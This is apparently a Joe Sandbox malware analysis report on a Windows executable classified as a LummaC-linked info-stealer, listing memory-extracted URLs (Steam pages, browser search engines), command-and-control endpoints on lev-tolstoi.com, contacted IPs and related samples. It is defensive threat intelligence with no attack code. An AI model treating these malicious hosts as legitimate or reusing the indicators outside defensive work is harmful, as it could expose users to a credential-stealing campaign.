                                                                                                                  https://lev-tolstoi.com/oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977872773.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979555678.0000000001442000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1895777813.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1863286746.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977740044.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://store.steampowered.com/privacy_agreement/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://store.steampowered.com/points/shop/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaoe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://ocsp.rootca1.amazontrust.com0:oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016oe9KS7ZHUc.exe, 00000000.00000003.1785251694.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1785174466.0000000005D02000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1809338619.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://sketchfab.comoe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.ecosia.org/newtab/oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://lv.queniujq.cnoe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-broe9KS7ZHUc.exe, 00000000.00000003.1834247835.0000000005DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.youtube.com/oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://store.steampowered.com/privacy_agreement/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://support.microsofoe9KS7ZHUc.exe, 00000000.00000003.1785174466.0000000005D04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/recaptcha/oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://checkout.steampowered.com/oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://lev-tolstoi.com/teoe9KS7ZHUc.exe, 00000000.00000003.1896190150.00000000014EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesoe9KS7ZHUc.exe, 00000000.00000003.1785251694.0000000005CD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/;oe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/about/oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://lev-tolstoi.com/eroe9KS7ZHUc.exe, 00000000.00000003.1896190150.00000000014EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                      unknown
                                                                                                                                                                      https://help.steampowered.com/en/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/market/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://store.steampowered.com/news/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://lev-tolstoi.com/E=oe9KS7ZHUc.exe, 00000000.00000003.1896190150.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1913981579.00000000014EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                            unknown
                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://lev-tolstoi.com/apimoe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979790273.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977740044.00000000014EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17oe9KS7ZHUc.exe, 00000000.00000003.1785251694.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1785174466.0000000005D02000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1809338619.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://lev-tolstoi.com/apiloe9KS7ZHUc.exe, 00000000.00000003.1913981579.00000000014EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://recaptcha.net/recaptcha/;oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://lev-tolstoi.com/apisoe9KS7ZHUc.exe, 00000000.00000003.1760100558.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760241719.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://steamcommunity.com/discussions/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/stats/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://medal.tvoe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://broadcast.st.dl.eccdnx.comoe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://store.steampowered.com/steam_refunds/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://x1.c.lencr.org/0oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://x1.i.lencr.org/0oe9KS7ZHUc.exe, 00000000.00000003.1833183024.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installoe9KS7ZHUc.exe, 00000000.00000003.1785251694.0000000005CD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchoe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.000000000143C000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://steamcommunity.com/profiles/7656119972433190Doe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001469000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001467000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://steamcommunity.com/workshop/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://login.steampowered.com/oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbboe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                104.21.66.86
                                                                                                                                                                                                                                lev-tolstoi.comUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                23.55.153.106
                                                                                                                                                                                                                                steamcommunity.comUnited States
                                                                                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1581630
                                                                                                                                                                                                                                Start date and time:2024-12-28 10:06:35 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 5m 7s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:4
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:oe9KS7ZHUc.exe
                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                Original Sample Name:2de305ce45cdf39a8ad3c35979492cdd.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                                                                • Number of non-executed functions: 2
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63, 20.12.23.50
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • Execution Graph export aborted for target oe9KS7ZHUc.exe, PID 7292 because there are no executed function
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                04:07:35API Interceptor8x Sleep call for process: oe9KS7ZHUc.exe modified
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                23.55.153.106MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    lev-tolstoi.comMPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                    726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                    steamcommunity.comMPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
